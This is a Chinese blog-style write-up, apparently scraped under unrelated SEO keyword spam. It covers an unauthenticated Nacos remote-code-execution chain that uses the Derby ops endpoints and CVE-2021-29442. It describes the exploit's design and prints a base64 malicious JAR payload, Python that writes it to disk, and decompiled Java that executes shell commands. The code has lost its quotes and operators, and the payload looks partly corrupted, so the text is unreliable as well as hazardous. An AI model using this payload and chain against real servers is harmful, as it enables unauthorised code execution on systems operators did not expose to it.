做司法亲子鉴定网站,泰安网站建设介绍,html网站开发事例教程,公众平台账号授权怎么弄免责声明#xff1a;请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、背景与…免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、背景与漏洞描述 202407月, 爆出漏洞作者说由于某些原因特意爆出了Nacos的一个RCE 0day漏洞。 Nacos 是一个用于动态服务发现和配置以及服务管理的平台Derby 是一个轻量级的嵌入式数据库。接口 /nacos/v1/cs/ops/derby 和 /nacos/v1/cs/ops/data/removal 在使用 Derby 数据库作为内置数据源时。用于运维人员进行数据运维和问题排查在使用 standalone 模式启动 Nacos 时为了避免因搭建外置数据库而占用额外的资源会使用 Derby 数据库作为数据源。 受影响版本的 Nacos 默认未开启身份认证/data/removal 接口存在条件竞争漏洞攻击者可借此接口执行恶意 SQL加载恶意 jar 并注册函数随后可以在未授权条件下利用 derby sql 注入漏洞CVE-2021-29442调用恶意函数来执行恶意代码。 此前官方开发者认为属于功能特性未做处理后在 2.4.0 版本中通过增加 derbyOpsEnabled 选项默认关闭 derby 接口来避免被滥用。
二、漏发复现与POC
1、exp python项目-目录结构 2、原理
1、配置config.py是service.py启动的一个HTTP接口 这个接口是提供给Nacos里面deby数据库获取加载恶意jar包内容(HTTP接口响应是JAR包的二进制内容) 2、exploit.py 输入要工具的Nacos的IP和服务端口已经RCE指令即可。 exploit.py会连接Nacos,然后请求Nacos的参数中注入了连接service.py的IP、端口以及需要RCE的指令。 请求到达nacos之后利用deby数据库的漏洞恶意请求service.py服务的接口加载jar包内容。 然后再输入RCE指令给jar包运行这个命令。 3、我们看下jar包内容已经反编译java源码
1、python将二进制生成文件exp.jar, 运行会在当前目录下生成exp.jar文件 import base64payload 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
data base64.b64decode(payload)with open(./test/exp.jar, wb) as f:f.write(data)
2、unzip exp.jar解压jar包 3、查看到test/poc/Example.class文件 4、使用jd-ui反编译查看下Example.class源码信息
jd-ui反编译工具: https://java-decompiler.github.io/ 反编译拿到的源代码如下
package test.poc;import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.io.StringWriter;public class Example {public static void main(String[] args) {String ret exec(ipconfig);System.out.println(ret);}public static String exec(String cmd) {StringBuffer bf new StringBuffer();try {String charset utf-8;String osName System.getProperty(os.name);if (osName ! null osName.startsWith(Windows))charset gbk; Process p Runtime.getRuntime().exec(cmd);InputStream fis p.getInputStream();InputStreamReader isr new InputStreamReader(fis, charset);BufferedReader br new BufferedReader(isr);String line null;while ((line br.readLine()) ! null)bf.append(line); } catch (Exception e) {StringWriter writer new StringWriter();PrintWriter printer new PrintWriter(writer);e.printStackTrace(printer);try {writer.close();printer.close();} catch (IOException iOException) {}return ERROR: writer.toString();} return bf.toString();}
}4、验证结果可以执行RCE 三、总结 EXP源码就不提供了原Github站点项目已被删除大家有兴趣研究网络安全的肯定有方法能找到学习资料嘻嘻。 作为IT人员时刻关注网络安全!!!
